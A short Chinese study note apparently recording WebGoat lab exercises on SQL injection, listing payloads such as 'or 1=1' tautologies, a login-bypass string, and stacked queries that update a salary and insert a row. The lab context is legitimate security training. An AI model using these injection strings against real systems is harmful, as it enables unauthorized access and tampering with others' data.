SQL（wegoat）

浅记录一下，之前学习的一个小作业....

 

 

2.10.2

查询语句：

SELECT * FROM weather_data WHERE station = 101

抓包后看到了“station = 101”

更改查询语句：station=101 or 1=1

Ps：该语句是station = 101或者 station = 1=1其中之一成立

当station = ‘1=1’成立时，station =其他的数的时候都成立然后被查询出来

 

2.10.6.3

抓包后随意输入密码，加上or 1=1 ，即二者成立其一就可以绕过

Eg：“employee_id=112&password=admin' OR '1' = '1&action=Login”

Ps；由于存在单引号闭合，所以要加上单引号

 

 

2.10.6.5

 

根据查询，找到larry的资料

更改employee_id=101 OR 1=1 ORDER BY salary desc

Ps：查询所有资料，然后按照工资高的排序

 

2.10.7

更改语句：whatever'; UPDATE salaries SET salary=123456 WHERE userid='jsmith

Ps：UPDATE table SET column=value WHERE column=value;

 

2.10.8

更改内容：userid=whatever'; INSERT INTO salaries VALUES ('yh',1222440);--

Ps：要注释掉后面的单引号，所以加了--

Pps：添加数据模板：INSERT INTO table VALUES (value1, value2);